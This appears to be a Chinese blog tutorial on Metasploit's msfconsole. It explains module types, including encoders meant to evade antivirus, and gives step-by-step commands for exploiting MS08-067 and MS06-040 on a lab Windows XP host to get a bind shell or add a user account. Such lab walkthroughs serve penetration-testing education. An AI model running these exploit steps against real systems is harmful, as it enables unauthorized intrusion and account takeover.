2021-08-21

Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。

在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。

对于其中的大部分命令,你可以输入help[COMMAND],进一步查看该命令的使用帮助信息。

MSF的六个模块:exploit,encoder,payload,aux,post,nops

exploit——渗透攻击模块

测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。

exploits总的来说共分为两类溢出(exploit)攻击方法,即主动溢出和被动溢出。主动溢出是针对目标主机的漏洞主动的进行攻击以获得控制权限,被动溢出是针对目标主机被动的监听然后获得相应的操作。

Exploit共分为13种,分别是:ais、bsdi、dialup、freebsd、hpux、irix、linux、multi、netware、osx、solaris、unix、windows。其中windows下面的最多。

encoder——编码器模块,对指令重新进行编码,用以实现反检测功能、指令顺利执行等

在metasploit中内置了27种encode模块,可对metasploit中的exploit进行编码(encode),以避免反病毒软件检测。如:

generic/none normal The “none” Encoder

mipsbe/longxor normal XOR Encoder

mipsle/longxor normal XOR Encoder

php/base64 great PHP Base64 encoder

ppc/longxor normal PPC LongXOR Encoder

payload——攻击载荷模块, 由一些可动态运行在远程主机上的代码组成

我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只能在目标机器上执行有限命令的程序。

aux——辅助模块,用以实现辅助攻击,如端口扫描工具、口令猜测破解、敏感信息嗅探等

post——后渗透攻击模块

在渗透攻击取得目标系统远程控制权之后,在受控系统中进行各式各样的后渗透攻击动作,比如获取敏感信息、进一步拓展、实施跳板攻击等。

nops——空指令模块,用以产生缓冲区填充的非操作性指令

使用msfconsole,了解msfcli,msfgui​​​​​​​

Metasploit目前提供了三种用户使用接口,一个是GUI模式,另一个是console终端模式,第三种是CLI(命令行)模式。

msfcli 虽然和msfconsole一样同为命令行界面,但是他不提供交互的命令行模式,直接通过命令行执行输出结果,直接调用辅助模块和攻击模块对目标进行渗透攻击,更为高效便捷。

msfgui 图形化界面工具可轻松地单击鼠标,输入目标 IP 地址,就可以使用 Metasploit 强大功能渗透进入目标系统 。

举例:

常用exploit,payload设置参数

show exploit——显示Metasploit中所有渗透攻击模块
show playload——查看所有活动状态的攻击载荷
攻击靶机并获取shell

   被攻击者IP地址:192.168.120.131,操作系统Windows XP sp3 

   攻击者IP地址:192.168.120.130

1.//查找ms08_067漏洞

msf > search ms08_067
在这里插入图片描述
2、//使用MS08_067漏洞
use exploit/windows/smb/ms08_067_netapi

3、//设置远程地址,正向连接
set RHOST 192.168.120.131

4、//设置ShellCode
set payload windows/shell_bind_tcp

5、//显示配置的选项
show options
在这里插入图片描述
6、//expliot攻击
![![在这里插入图片描述](https://img-blog.csdnimg.cn/624b08c35dd54773b296bee8805c26a2.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUyODI0NzUy,size_16,color_FFFFFF,t_70)
成功返回Shell
在这里插入图片描述
命令含义:

  1. show exploits

显示MetaSploit目前所能够测试的所有漏洞及相关描述

  1. usewindows/smb/ms06_040_netapi

选择MS06-040进行测试

  1. , info

显示当前所选漏洞的描述信息

  1. show targets

显示当前所选漏洞能够影响的操作系统

  1. set target 0

设置target为0,即自动识别Windows 2000 和Windows XP系统

  1. show payloads

显示可适用于当前所选漏洞的shellcode

  1. set payloadwindows/adduser

选用adduser为shellcode

  1. show options

显示当前所选漏洞和shellcode需要配置的选项

  1. set RHOST192.168.88.137

按照 show options 的提示设置目标主机的地址

  1. set PASS 123456

按照 show options 的提示设置账密码

  1. set USERpolarNight

按照 show options 上的提示设置用户名

  1. exploit
    参考资料:

1.msfconsole 控制台使用和操作

2.Metasploit用法大全

3.初学

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值